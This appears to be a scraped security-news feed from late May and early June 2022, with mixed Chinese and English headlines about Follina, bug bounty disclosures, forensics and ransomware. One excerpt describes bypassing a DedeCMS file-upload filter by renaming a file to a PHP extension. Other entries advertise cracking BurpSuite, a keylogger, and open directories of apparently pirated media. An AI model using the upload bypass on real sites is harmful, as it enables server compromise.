    很难想到,魔幻照进了现实,真的有“傻大胆”敢为人先,企图删库跑路,一走了之。
    慢雾:NFT 项目 verb 钓鱼网站分析
    对一切保持怀疑。
    FreeBuf早报 | 支付赎金的医疗机构比过去多两倍;四分之三公司因DNS攻击而停工
    近四分之三的公司因 DNS 攻击而停工。
    数百个Elasticsearch数据库遭到勒索攻击
    因为Elasticsearch数据库安全防护薄弱的缘故,导致其被黑客盯上。
    安全大事件!360万+MySQL服务器暴露在互联网上
    至少有360万台MySQL服务器已经暴露在互联网上,毫无疑问它们将成为黑客和勒索攻击者最有吸引力的目标。
    欧洲刑警组织宣布已查封恶意软件FluBot
    欧洲刑警组织在近期一次由11国组成的联合执法行动中,宣布正式取缔主要针对用户网银账号的恶意软件组织FluBot。
    密码应用安全性评估要点之数字签名技术
    数字签名技术是现代密码算法中非对称密码算法和消息摘要算法相结合的十分优秀的解决方案,应用面广泛,涉及到的知识点很多。
  • Open

    Complete Bug Bounty CheatSheet | Joas Antonio
    XSS, SQLi, SSRF, CRLF, CSV-Injection, Command Injection, Directory Traversal, LFI, XXE, Open-Redirect, RCE, Crypto, Template Injection… Continue reading on Medium »
    How I Mass hunt for Admin Panel Access…
    Hello All,🙂 Continue reading on Medium »
    Reverse Engineering Discord’s Party Mode
    Continue reading on Dev Genius »
    HTML Injection On Trio App
    Hey Hackers!!! I am back again! My name is Krishnadev P Melevila, To know more about me, Search on Google “ Who is Krishnadev P Melevila”! Continue reading on Medium »
    HTML Injection On Trio App
    Hey Hackers!!! I am back again! My name is Krishnadev P Melevila, To know more about me, Search on Google “ Who is Krishnadev P Melevila”! Continue reading on InfoSec Write-ups »
  • Open

    AWS Load Balancer Controller Managed Security Groups can be replaced by an unprivileged attacker
    Kubernetes disclosed a bug submitted by t0rr3sp3dr0: https://hackerone.com/reports/1238017 - Bounty: $500
    AWS Load Balancer Controller can be used by an attacker to modify rules of any Security Group that they are able to tag
    Kubernetes disclosed a bug submitted by t0rr3sp3dr0: https://hackerone.com/reports/1238482 - Bounty: $500

  • Open

    Real Player Remote Arbitrary Code Execution Vulnerability
    Article URL: https://github.com/Edubr2020/RP_DCP_Code_Exec Comments URL: https://news.ycombinator.com/item?id=31589107 Points: 2 # Comments: 1
    A powerful vulnerability scanner for Windows, macOS and Linux that you will love
    Article URL: https://www.mageni.net/ Comments URL: https://news.ycombinator.com/item?id=31588325 Points: 2 # Comments: 0
    CVE-2022-23088 – FreeBSD Network Subsystem Remote Code Execution Vulnerability
    Article URL: https://www.freebsd.org/security/advisories/FreeBSD-SA-22:07.wifi_meshid.asc Comments URL: https://news.ycombinator.com/item?id=31583875 Points: 1 # Comments: 1
    Microsoft Office zero-day vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190 Comments URL: https://news.ycombinator.com/item?id=31580756 Points: 6 # Comments: 0
  • Open

    SANS FOR500 with no prior forensic experience?
    I am currently a Threat Intelligence Analyst. I was thinking about taking the For500 since I want to transition to Forensics. I am hesitant since I have no forensic experience/knowledge. Coming from a non technical background, would you recommend this course? submitted by /u/hackprincess [link] [comments]
    Avilla Forensics 3.0
    https://github.com/AvillaDaniel/AvillaForensics 🔎A very powerful set of tools for a forensic specialist. For full-fledged work, Java and python are required (packages:instaloader, mvt, pycryptodome and Whacipher). Only to work with smartphones, they must have debugging mode enabled. But the abundance of opportunities that we get for free is just amazing. Yes, there are products from Oxygen Software in Russia, but they are paid, although not much better, probably only working with cloud services like Oxygen, which is not enough, but do not forget that it's all completely free. submitted by /u/saqfi [link] [comments]
  • Open

    Exfiltrate GDrive access token using CSRF
    Dropbox disclosed a bug submitted by staz0t: https://hackerone.com/reports/1468010 - Bounty: $1728
    user can bypass password enforcement when federated sharing is enabled
    Nextcloud disclosed a bug submitted by michag86: https://hackerone.com/reports/838510 - Bounty: $250
  • Open

    Security Validation Tools
    Hey all, I was listening to a webinar today and one of the experts brought up security validation tools, which I hadn't heard before. I was curious if folks are using any of these, and what are the using? The way it was explained is a potential red team or other smaller team looking to find gaps in their own security. Some background, I've brought my company huge strides over the past 5 years improving our cyber program from training, monitoring, pentesting, everyday preventative tools, and annual 3rd party program maturation, but I don't know what I don't know, so I'm very curious. Appreciate everyone's time. submitted by /u/derf3970 [link] [comments]
    Ditching the OOTB SIEM
    After a less than successful SIEM transition, I am starting to look at the possibility of building a SIEM by integrating multiple COTs products. Essentially looking at integrating a data lake, XDR/Correlation capability and a SOAR solution. Has anyone successfully done this (aside from Palo’s SoC) and have any input/feedback to share? submitted by /u/Omnipotent0ne [link] [comments]
  • Open

    Some flicks
    http://www.lemaurecourtois.com/film/ submitted by /u/DismalDelay101 [link] [comments]
    Teaching Content site...! probably boring
    https://www.futuremanagers.com/wp-content/uploads/ submitted by /u/RE167 [link] [comments]
    Index of movies and media
    https://setnomanime.me/9:/Movies/ submitted by /u/Isolatedleliel [link] [comments]
  • Open

    Seven Essential Questions for Ethical War Crimes Documentation
    Considerations for those collecting, investigating, and analyzing open source information in Ukraine and elsewhere Continue reading on Human Rights Center »
    War in Ukraine / May 31
    Difficult situation in Severodonetsk Continue reading on Medium »
  • Open

    How I found a GoldMine but got No Gold
    Background: Continue reading on Medium »
    Kubernetes 101 | Setting up Kubernetes Cluster Locally
    This blog is about setting the local Kubernetes cluster for learning & testing using multiple tools like Kind, Minikube, Kubeadm & K3s. Continue reading on InfoSec Write-ups »
    Microsoft Dynamics Container Sandbox RCE via Unauthenticated Docker Remote API 20,000$ Bounty
    On 17.11.2021 I reported a critical security issue in Microsoft Dynamics Container Sandbox, that allows Microsoft Customers to setup a… Continue reading on Medium »
    Cryptography a Foundation of Cyber Security.
    Continue reading on Medium »
    Part 2: A pragmatic guide to building your bug bounty program
    Budgets and payments, and dealing with beg bounties Continue reading on Airwallex Engineering »
    WordPress User Meta Lite / Pro 2.4.3 Suffers Path Traversal Exploit
    More @ https://skynettools.com  Currently the WordPress Plugin User Meta 2.4.3, both Lite and Pro is vulnerable to a Path Traversal… Continue reading on Medium »
    Good to see you back. I have always loved your write ups. Simple and to the point. Keep it up
    Continue reading on Medium »
  • Open

    Using Python to unearth a goldmine of threat intelligence from leaked chat logs
    submitted by /u/SCI_Rusher [link] [comments]
    Information Security BASICS - Anvil Secure
    submitted by /u/anvilventures [link] [comments]
    Unofficial patches for the 0-day vulnerability called Follina (CVE-2022-30190)
    submitted by /u/CyberMasterV [link] [comments]
    GCP exploitation & lateral movement write up! - @securfreakazoid
    submitted by /u/securfreakazoid [link] [comments]
    Twitch Internal Security Tools: In-depth Analysis of the Leaked Twitch Security Tools
    submitted by /u/mazen160 [link] [comments]
    Sushi Time: Hunting for Fresh Phish
    submitted by /u/0xDAV1D [link] [comments]
    OST2 Vulnerabilities 1001: C-Family Software Implementation Vulnerabilities (Taught via explaining > 3 dozen CVEs from the last 3 years)
    submitted by /u/OpenSecurityTraining [link] [comments]
    Minerva's evasion based CTF is open for registration
    submitted by /u/woja111 [link] [comments]
  • Open

    Using Python to unearth a goldmine of threat intelligence from leaked chat logs
    submitted by /u/SCI_Rusher [link] [comments]
    GCP exploitation & lateral movement write up! - @securfreakazoid
    submitted by /u/securfreakazoid [link] [comments]
  • Open

    Enumeration and lateral movement in GCP environments
    This write up is about a pentest we did in which we managed to compromise a hybrid GCP hosted infrastructure using native GCP tools for… Continue reading on InfoSec Write-ups »
    Home-Grown Red Team: Using PhishPi For Captive Portal Evil Twin Attacks And Website Cloning
    A captive portal is one of the more interesting topics in the Wifi hacking arena. If you’re not familiar with what a captive portal is or… Continue reading on Medium »
  • Open

    Code Intelligence raises $12M to build dev-first advanced fuzzing solutions
    Article URL: https://www.code-intelligence.com/blog/series-a Comments URL: https://news.ycombinator.com/item?id=31584225 Points: 4 # Comments: 0
  • Open

    CVE-2022-23088 – FreeBSD Network Subsystem Remote Code Execution Vulnerability
    Article URL: https://www.freebsd.org/security/advisories/FreeBSD-SA-22:07.wifi_meshid.asc Comments URL: https://news.ycombinator.com/item?id=31583875 Points: 1 # Comments: 1
  • Open

    SecWiki News 2022-06-01 Review
    蓝牙协议对汽车安全的影响研究报告 by lxghost SCA的困境和出路 by ourren 图神经网络及认知推理总结和普及 by ourren SSL 指纹识别和绕过 by ourren APICraft: 为闭源的SDK库生成模糊的驱动程序 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-01 Review
    蓝牙协议对汽车安全的影响研究报告 by lxghost SCA的困境和出路 by ourren 图神经网络及认知推理总结和普及 by ourren SSL 指纹识别和绕过 by ourren APICraft: 为闭源的SDK库生成模糊的驱动程序 by ourren 更多最新文章,请访问SecWiki
  • Open

    浏览器自动化框架沦为攻击者的工具
    越来越多的威胁参与者正在使用免费的浏览器自动化框架作为其攻击活动的一部分。
    如何使用C2concealer生成随机化的C2 Malleable配置文件
    C2concealer是一款功能强大的命令行工具,可帮助广大研究人员可以轻松生成随机化的C2 Malleable配置文件。
    如何使用ShadowClone最大化云端服务的功能
    ShadowClone可以帮助我们充分利用云服务商提供的Free Tier,并极大程度地增强命令行工具的功能。
    物联网终端安全入门与实践之玩转物联网固件(上)
    本期我们将介绍物联网终端设备的固件获取方法、文件系统提取及分析技巧。
    FreeBuf早报 | 美发布公共研究数据库建设指南;诈骗分子利用俄乌冲突收集“善款”
    近日,美国白宫科技政策办公室(OSTP)发布了联邦资助研究数据库理想特征指南。
    go语言模糊测试(一):go-fuzz
    介绍关于go语言模糊测试工具go-fuzz的使用
    FreeBuf甲方群话题讨论 | 你有经历过威胁误报吗?
    面对大量的新增漏洞,应该如何从中筛选出真正有威胁的漏洞,做到快速、有效的判断识别,减少误报率?
    2021 Owasp top 10 逐个击破--A04:2021 – Insecure Design
    本文着重解读A02  Cryptographic Failures(加密机制失效)。
    微软MSDT零日漏洞上线CS
    据了解,该零日漏洞会影响多个Microsoft Office版本,包括Office、Office2016和Office 2021。
    悄无声息,Google已禁止Colab上的Deepfake项目
    有消息显示,Google已于近日悄悄禁止了其在 Colaboratory服务上的深度伪造(Deepfake)项目。
    通过DCERPC和ntlmssp获取Windows远程主机信息
    本文通过利用DCERPC协议的ping,附加NTLMSSP认证信息来获取windows远程主机的版本号等信息
    诈骗分子利用俄乌冲突,大肆收集“善款”
    FBI 发现诈骗分子冒充合法的乌克兰人道主义援助组织,以帮助乌克兰难民和战争受害者为由,收集捐款。
    摩诃草组织以巴基斯坦相关政府机构文件为诱饵的攻击活动分析
    背景摩诃草,又名Hangover、Patchwork、白象等,奇安信内部跟踪编号为APT-Q-36。
    数篷科技:助力数据全生命周期的零信任数据安全解决方案 | 网安新势力SOLO发布季
    企业安全如何应对环境带来的新挑战?网安新势力SOLO发布季告诉你!
    速看,微软MSDT零日漏洞的补丁来了
    5月30日,微软发布了相关的缓解措施,可阻止攻击者利用该零日漏洞发起远程攻击。
  • Open

    How I am winning battle with Windows 10 and 11 Security and avoiding detection
    No content preview
  • Open

    How I am winning battle with Windows 10 and 11 Security and avoiding detection
    No content preview
  • Open

    How I am winning battle with Windows 10 and 11 Security and avoiding detection
    No content preview

  • Open

    Tryhackme linuxloganalysis Writeup
    No content preview
    Tryhackme ramanalysis Writeup
    No content preview
    Tryhackme tsharkpcapanalysis Writeup
    No content preview
    SSO: A Secure way for authentication and authorization ?
    Introduction Continue reading on InfoSec Write-ups »
    Tryhackme Pcap Analysis Room Official Writeup
    No content preview
    HackThebox: Lame
    No content preview
    Erlik Machine Writeup
    No content preview
    Serial Communication with Raspberry Pi Pico in Windows 10/11 via WSL
    No content preview
    Top 5 Hacking Book , Must Read !!
    No content preview
    Persistent Windows 10 and 11 keylogger (keylogiq)
    No content preview
  • Open

    Tryhackme linuxloganalysis Writeup
    No content preview
    Tryhackme ramanalysis Writeup
    No content preview
    Tryhackme tsharkpcapanalysis Writeup
    No content preview
    SSO: A Secure way for authentication and authorization ?
    Introduction Continue reading on InfoSec Write-ups »
    Tryhackme Pcap Analysis Room Official Writeup
    No content preview
    HackThebox: Lame
    No content preview
    Erlik Machine Writeup
    No content preview
    Serial Communication with Raspberry Pi Pico in Windows 10/11 via WSL
    No content preview
    Top 5 Hacking Book , Must Read !!
    No content preview
    Persistent Windows 10 and 11 keylogger (keylogiq)
    No content preview
  • Open

    Tryhackme linuxloganalysis Writeup
    No content preview
    Tryhackme ramanalysis Writeup
    No content preview
    Tryhackme tsharkpcapanalysis Writeup
    No content preview
    SSO: A Secure way for authentication and authorization ?
    Introduction Continue reading on InfoSec Write-ups »
    Tryhackme Pcap Analysis Room Official Writeup
    No content preview
    HackThebox: Lame
    No content preview
    Erlik Machine Writeup
    No content preview
    Serial Communication with Raspberry Pi Pico in Windows 10/11 via WSL
    No content preview
    Top 5 Hacking Book , Must Read !!
    No content preview
    Persistent Windows 10 and 11 keylogger (keylogiq)
    No content preview
  • Open

    Threat Brief: CVE-2022-30190 – MSDT Code Execution Vulnerability
    CVE-2022-30190 enables remote code execution with the same privileges in the calling application and there are proof-of-concept examples of zero-click variants. We recommend protections and mitigations. The post Threat Brief: CVE-2022-30190 – MSDT Code Execution Vulnerability appeared first on Unit42.
    Network Security Trends: November 2021 to January 2022
    Network security trends observed November 2021 to January 2022 included high levels of cross-site scripting. The post Network Security Trends: November 2021 to January 2022 appeared first on Unit42.
  • Open

    Django debug enabled showing information about system, database, configuration files
    Glovo disclosed a bug submitted by omarelfarsaoui: https://hackerone.com/reports/1561377
    Deprecated owners.query API bypasses object view policy
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1584409 - Bounty: $300
    Able to bypass the fix on DOM XSS at [www.adobe.com]
    Adobe disclosed a bug submitted by saajanbhujel: https://hackerone.com/reports/1398374
    DOM XSS on www.adobe.com
    Adobe disclosed a bug submitted by saajanbhujel: https://hackerone.com/reports/1260825
    CSRF token validation system is disabled on Stripe Dashboard
    Stripe disclosed a bug submitted by rodolfomarianocy: https://hackerone.com/reports/1493437 - Bounty: $2500
    Improper input-size validation on the user new session name can result in server-side DDoS.
    Nextcloud disclosed a bug submitted by demonia: https://hackerone.com/reports/1153138 - Bounty: $100
    BlIND XSS on https://open.vanillaforums.com
    Vanilla disclosed a bug submitted by mohit0786: https://hackerone.com/reports/1189885 - Bounty: $300
    Self XSS in attachments name
    Acronis disclosed a bug submitted by mega7: https://hackerone.com/reports/1536901
  • Open

    How Fuzzing helps me to get my first bounty?
    Hello Everyone, Continue reading on Medium »
    Astar Network Hosts a $1 million Bug Bounty Program on Immunefi
    05/31/2022 — We are launching a bug bounty program with Immunefi, Web3’s leading bug bounty platform, already protecting $100 billion in… Continue reading on Astar Network »
    From open redirect to RCE in one week
    I will tell you a story of how I chained multiple security issues to achieve RCE on several hosts of the Mail.Ru Group (or VK now). Continue reading on Medium »
    RootME: walkthrough
    Once again back with another story of hacking on the TryHackMe platform.The room this time a free room anyone can give it a try without a… Continue reading on Medium »
    Abusing Facebook’s feature for a permanent account confusion (logic vulnerability)
    TLDR; Logic vulnerability on Facebook led to half 2FA bypass/denial of service by locking users to login into the attacker’s controlled… Continue reading on Medium »
    SQL injection to Remote Command Execution (RCE)
    Hello hackers, before we get into it, I would like to know your view of this — between a hacker’s curiosity and instinct which would you… Continue reading on Medium »
    Price Parameter Tampering | How I Change Any Price on Website
    Hi everyone how are you?, I hope you guys are well. I’m RyuuKhagetsu, this is my article in English, sorry if there are any mistakes. I… Continue reading on Medium »
    Web service-specific vulnerability scanners
    Vulnerability scanners are automated tools that crawl an application to identify the signatures of known vulnerabilities. Continue reading on Medium »
  • Open

    Unknown JS from Chrome Extension
    Found an unknown extension installed on a user's device that was loaded via a powershell script. JS is not my forte by any stretch of the imagination. Can anyone help me get an idea of what's happening here? Extension was loaded with this script set in the background. https://pastebin.com/p8sS0cye submitted by /u/phase [link] [comments]
    Threat Intel services with CAPEC or CWE classifications?
    I've recently been doing a lot of work with using threat intel feeds (which map threat activity to MITRE' ATT&CK TTPs) to support enterprise threat modeling. Wondering if it's possible to do the same with application threat modeling. Obviously, ATT&CK is not app-focused, so my current service (which only maps to ATT&CK) won't do the job. Does anybody know of any threat intel services that map threat activity to CAPEC or CWE classifications, for more granular app-level threat intel? submitted by /u/drstarskymrhutch [link] [comments]
    Are exe logged somewhere ?
    Is execution of programs (both in Program files and portable ones) logged somewhere in Windows ? Event viewer maybe ? Registry ? Other places ? I mean a default Windows 10 / 11 installation. Thanks for help submitted by /u/AnotherRedditUsr [link] [comments]
  • Open

    CVE-2022-21404: Another story of developers fixing vulnerabilities unknowingly because of CodeQL
    submitted by /u/cldrn [link] [comments]
    From open redirect to RCE in one week
    submitted by /u/smaury [link] [comments]
    How to use Atomic Red Team to test Falco rules in K8s
    submitted by /u/MiguelHzBz [link] [comments]
    Want to be a HVACker? Learn some new skills by exploiting security, fire, and HVAC systems
    submitted by /u/entropydaemon6 [link] [comments]
  • Open

    Nmap Post Port Scans | TryHackMe (THM)
    Lab Access: https://tryhackme.com/room/nmap04 Continue reading on Medium »
  • Open

    【安全通报】Microsoft Office 远程代码执行漏洞(CVE-2022...
    Microsoft Office 存在远程代码执行漏洞,攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件,通过 'ms-msdt' URI 来执行恶意 PowerShell...
  • Open

    【安全通报】Microsoft Office 远程代码执行漏洞(CVE-2022...
    Microsoft Office 存在远程代码执行漏洞,攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件,通过 'ms-msdt' URI 来执行恶意 PowerShell...
  • Open

    Questions about responsible disclosure
    I just found my first few vulnerabilities in a real world target, and I realize I don't really know how to properly disclose them to the vendor. The target is close source and it is a relatively large vendor so it isn't really clear how I should contact them. Any advice or standards about how I can determine who to contact? Also what is typically expected in body of the report? I'm planning on including a brief description of the vulnerabilities as well as a proof of concept and simple exploit. Is there anything else I should plan to include? Thanks in advance. submitted by /u/BinaryLuddite [link] [comments]
    Exploit Development Resources
    https://github.com/wtsxDev/Exploit-Development Share and Support! submitted by /u/saqfi [link] [comments]
  • Open

    High-Throughput, Formal-Methods-Assisted Fuzzing for LLVM
    Article URL: https://blog.regehr.org/archives/2148 Comments URL: https://news.ycombinator.com/item?id=31572268 Points: 3 # Comments: 0
  • Open

    War in Ukraine / May 30
    The military threat from Belarus remains Continue reading on Medium »
    Sakura Room OSINT CTF Writeup
    Here’s my writeup of the Sakura Room OSINT CTF by OSINT Dojo on TryHackMe, including solutions (spoiler alert!). Continue reading on Medium »
    Horse hunting: How we found Sofia Abramovich’s horses
    Insights from the Russian Asset Tracker project Continue reading on OCCRP: Unreported »
  • Open

    GCIH training materials
    Hi, can anyone recommend "external" (ie. not sans) training materials for GCIH for self study? Yes I know sans got their own books but if I could attend I would. Thnks in advance for not telling me how SANS is the only way. submitted by /u/Hot-Supermarket5177 [link] [comments]
  • Open

    SecWiki News 2022-05-31 Review
    Twitter 威胁情报跟踪与评估 by Avenger 浅谈Windows传统取证 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-31 Review
    Twitter 威胁情报跟踪与评估 by Avenger 浅谈Windows传统取证 by ourren 更多最新文章,请访问SecWiki
  • Open

    Killing The Bear - New actor added: BlackCat (a.k.a Alphv)
    New actor BlackCat (a.k.a Alphv - Noberus) added to 🐻 KillingTheBear 📙 https://killingthebear.jorgetesta.tech/actors/alphv It comes heavily loaded with TTPs and IOCs , processes, records, etc so SOC, CTI, Threat Hunting people take advantage and give it a try. Apart from the traditional sections, also added a timeline of victims and attacks. submitted by /u/J-Testa [link] [comments]
    Finding Main() with Ghidra
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    零日漏洞积极利用,或影响多个Microsoft Office版本
    近日,网络安全研究员nao_sec发现了一个从白俄罗斯上传至分析服务网站VirusTotal的恶意Word文档。
    FreeBuf早报 | FluBot恶意软件席卷欧洲;南非总统的个人信贷数据泄露
    黑客团伙SpiderLog$公开窃取了南非总统自2000年代在国内四大银行之一的贷款详细记录。
    利用腾讯云函数搭建免费代理池(搭建过程)
    最近听师傅有提到云函数搭建代理池能实现代理功能来隐藏ip,原理是利用云函数可以对外发包的功能再配合socks服务,这里记录一下搭建过程。
    WhatsApp 新骗局曝光,可劫持用户账户
    专家警告称,一个新的WhatsApp OTP 骗局正在被广泛利用,攻击者可以通过电话劫持用户的账户。
    匿名者声称将对白俄罗斯发起入侵
    匿名者黑客组织Spid3r声称攻击了白俄罗斯政府网站,以报复白俄罗斯支持俄罗斯入侵乌克兰。
  • Open

    DedeCMS 文件上传漏洞分析
    作者:天融信阿尔法实验室 原文链接:https://mp.weixin.qq.com/s/tLyoN9JYRUAtOJTxWEP8DQ 0x01 前言 前段时间看到有篇文章是关于DedeCMS后台文件上传(CNVD-2022-33420),是绕过了对上传文件内容的黑名单过滤,碰巧前段时间学习过关于文件上传的知识,所以有了这篇文章,对DedeCMS的两个文件上传漏洞(CVE-2018-2012...
  • Open

    DedeCMS 文件上传漏洞分析
    作者:天融信阿尔法实验室 原文链接:https://mp.weixin.qq.com/s/tLyoN9JYRUAtOJTxWEP8DQ 0x01 前言 前段时间看到有篇文章是关于DedeCMS后台文件上传(CNVD-2022-33420),是绕过了对上传文件内容的黑名单过滤,碰巧前段时间学习过关于文件上传的知识,所以有了这篇文章,对DedeCMS的两个文件上传漏洞(CVE-2018-2012...
  • Open

    DedeCMS文件上传漏洞分析
    前言 前段时间看到有篇文章是关于DedeCMS后台文件上传(CNVD-2022-33420),是绕过了对上传文件内容的黑名单过滤,碰巧前段时间学习过关于文件上传的知识,所以有了这篇文章,对DedeCMS的两个文件上传漏洞(CVE-2018-20129、CVE-2019-8362)做一个分析。 简介 DedeCMS简介 DedeCMS由上海卓卓网络科技有限公司研发的国产PHP网站内容管理系统;具有高效率标签缓存机制;允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。众多的应用支持;为用户提供了各类网站建设的一体化解决方案,在本版本中,增加了分类、书库、黄页、圈子、问答等模块,补充一些用户的特殊要求 。 DedeCMS V5.7 SP2前台文件上传(CVE-2018-20129) 漏洞复现 复现环境:phpstudy、DedeCMS V5.7 SP2、php5.6.9 前提条件:会员模块开启、以管理员权限登录。 会员模块默认情况下是不开启的,需要管理员在后台手动。 登录到前台以后找到内容中心,发表一篇文章,点击下面编辑器中找到上传图片按钮,其实这里原本想实现的功能就是一个简单图片上传的功能。 然后使用BurpSuite抓包,把文件名称从1.png改成1.png.p*hp,然后放包上传。 在响应信息中得到上传文件的保存地址,并且文件的后缀也是PHP。 但是当我们尝试去访问这个文件时会发现有的文件是不解析的,这跟我们上传的文件有关系,这个问题我们后面再解释。 上传的脚本文件可以正常利用。 漏洞分析 从抓取的数据包可以看到提交路径是/dedecmsgbk/include/dialog/select_images_post.php,跟进这个文件看一下进行了怎样的处理。 …
  • Open

    technical specs and schematics for rocket engines
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    photos of Brussels
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

  • Open

    Computer Forensics and Digital Investigations Bachelor's degree question
    Hi all, I've been in the IT field for around 12 years, ranging from Scrum Master to Software Engineering Manager (where I've now been a few years). I've been completely fascinated by Computer Forensics though and would love to break into this area. For me, I learn best with structure so I prefer taking a formal program. Is anyone familiar with Champlain College? They have an online bachelor's degree in Computer Forensics and Digital Investigations that I've been looking into. Would love to hear any experience there, or recommendations for other programs! I'm going to continue working full time, so it's important that the program is online only. submitted by /u/anautumnsshade [link] [comments]
    Converting MAC images
    Can someone let me know how I can covert a MAC image (APFS) into E01? submitted by /u/Pepperknowsitall [link] [comments]
    Cellebrite Thumbnail Recovery
    Hello everyone, I have two questions regarding a Cellebrite extraction on an iPhone XR on the topic of thumbnails. What does the “access time” mean? Is this the time that the client accessed the photo throughout the day? What is a “creation time”? submitted by /u/ForsakenRKT [link] [comments]
  • Open

    Follina – a Microsoft Office code execution vulnerability
    Article URL: https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e?gi=ab30e3e1bdaf Comments URL: https://news.ycombinator.com/item?id=31563980 Points: 1 # Comments: 0
    Follina – a Microsoft Office code execution vulnerability
    Article URL: https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e?gi=13aa99ae48de Comments URL: https://news.ycombinator.com/item?id=31554823 Points: 1 # Comments: 0
  • Open

    Anyone know a good compliance rules matrix template?
    I am looking to organize all the regulatory compliance rules into one nice document to show here is all the different regulatory rules we need to follow. By implementing a solution for this or this we get this, this and this covered in these different compliance frameworks. I am thinking of how to show we are covering all the items from (ISO 27001, CIS, our 3416, Pipeda, OSFI ect..) I was thinking if there was a template for a raci or matrix of some kind that someone can point me to? or how do others track all of the regulations they need to follow and show they are following them? Any help is great. Thanks. submitted by /u/RecoverAdventurous12 [link] [comments]
    Are there any bootcamps or short-term/accelerated courses for a beginner to infosec that would actually help land a job?
    I've heard mostly negative-leaning mixed things about bootcamps, but right now I'm looking for something that will help me get an entry level infosec job without a 4-year degree (degree will come afterward, just need to be able to eat and sleep somewhere while I get it). I do very well with self-paced learning and I learn very quickly. I know that there are lots of resources for teaching yourself and I plan to utilize them, but I'm more concerned with getting some stamp on my resume to get my foot in the door. ​ e: For clarification - I'm less concerned with how effective the teaching is because I can learn on my own, I'm more concerned with it providing me with workplace-relevant things to learn/teach myself and with its prestige in landing a small-time role somewhere. submitted by /u/No_Manufacturer_4701 [link] [comments]
    Education
    I know of sans institute and WGU. They are awesome in which you can earn certs while you earn your degree. Are was wondering if there any other colleges/institutes that offer the same package? Currently located in Ohio. Price is not an issue for me due to G.I. Bill. I’m thinking of going with WGU in information tech bachelors and then going to sans for their masters. I have looked into Wright state for their computer science degree just not so sure due to the fact they don’t offer certs as you get your degree. submitted by /u/Particular-Fault9078 [link] [comments]
    Tool to find secrets in a text message
    We are looking for a tool to find secrets in a text message. The secrets could be AWS keys, Slack auth tokens, api tokens, etc. The text message are usually typed by the user or they might copy past some configuration files which can contain secrets. I looked at a few tools like semgrep, gitleaks, they work on source files or github repositories. But i need some tool that accepts a text message and returns the result. Thanks in advance. submitted by /u/kmkanagaraj [link] [comments]
  • Open

    UPnProxyChain: a Tool to Exploit Devices Vulnerable to UPnProxy
    submitted by /u/Salmiakkilakritsi [link] [comments]
    New Zero-Day Code Execution Vulnerability In MS Office - Follina
    submitted by /u/sciencestudent99 [link] [comments]
    Mass account takeover in Yunmai smartscale API (full disclosure)
    submitted by /u/adrian_rt [link] [comments]
    Offensive Windows IPC Internals 3: ALPC
    submitted by /u/0xdea [link] [comments]
  • Open

    PicoCTF Review
    Hi! Guys I’m back with a new blog and I’m so excited because with this site you can learn a LOT! Continue reading on Medium »
    How to Crack & Install BurpSuite Professional in Kali Linux
    Steps to crack & Install Burpsuite Pro in Kali-Linux Continue reading on Medium »
    Top 5 Hacking Book , Must Read !!
    A Hacking and cybersecurity books guide which tells you about top 10 Hacking books . Continue reading on InfoSec Write-ups »
    How to find & access Admin Panel by digging into JS files…
    Hello All,🙂 Continue reading on Medium »
    How I found my first ever XSS on a website.
    So, I have been into web hacking lately. While into it, I have explored bug bounties but never found a bug in real website. I have tested… Continue reading on Medium »
    Introducing Melos Bug Bounty Program
    We’re happy to see how quickly Melos Studio has grown so far, but with that comes some concerns. We have seen many recent crises and fraud… Continue reading on Medium »
    Web application hacking methodology
    Systematic and goal-oriented penetration testing always starts with the right methodology. The following diagram shows how web application… Continue reading on Medium »
    Account Takeover Via Rxss Post
    Hello There, My Name is Aryan From Kurdistan, Bug Hunter in Hackerone with Experience 6 Months Also I Student in university, Forgive me… Continue reading on Medium »
  • Open

    War in Ukraine / May 27–29
    Slowing down the pressure of sanctions Continue reading on Medium »
    Hack Hydra co-owner’s crypto wallet
    A Moscow court can confiscate a record amount for Russia from a drug dealer’s crypto wallet, but he does not give the password. We are… Continue reading on Medium »
    Don’t Rely on Tools — OSINT Challenge 24
    Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out where it was taken… Continue reading on Medium »
    Hunting Usernames With Sherlock
    Learn how to use sherlock, a powerful command line OSINT tool used for hunting down usernames across social networks. Continue reading on Medium »
  • Open

    WEB-DLs and Remuxes of Movies and Series
    http://195.154.231.76/mteam/269573/ submitted by /u/GrowAsguard [link] [comments]
  • Open

    SecWiki News 2022-05-30 Review
    SecWiki周刊(第430期) by ourren 恶意npm包的自动化挖掘方法 by ourren 诈骗知名门户的黑产团伙溯源分析 by ourren 搜狐中招钓鱼邮件诈骗的技术和基础设施分析 by ourren RSAC 2022 – 创新沙盒观感 (1) by ourren PE文件结构解析3 by SecIN社区 Artillery: JAVA 插件化漏洞扫描器 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-30 Review
    SecWiki周刊(第430期) by ourren 恶意npm包的自动化挖掘方法 by ourren 诈骗知名门户的黑产团伙溯源分析 by ourren 搜狐中招钓鱼邮件诈骗的技术和基础设施分析 by ourren RSAC 2022 – 创新沙盒观感 (1) by ourren PE文件结构解析3 by SecIN社区 Artillery: JAVA 插件化漏洞扫描器 by ourren 更多最新文章,请访问SecWiki
  • Open

    The Art of Fuzzing (2017) [pdf]
    Article URL: https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2017_11/the_art_of_fuzzing_slides.pdf Comments URL: https://news.ycombinator.com/item?id=31559280 Points: 2 # Comments: 0
  • Open

    FreeBuf早报 | Android 预装应用受高危漏洞影响;FluBot 移动恶意软件席卷欧洲
    微软披露了在 mce Systems 提供的 Android Apps 移动服务框架中的严重安全漏洞,多个运营商的默认预装应用受影响。
    互联网金融企业DevSecOps落地实践 | FreeBuf甲方社群直播回顾
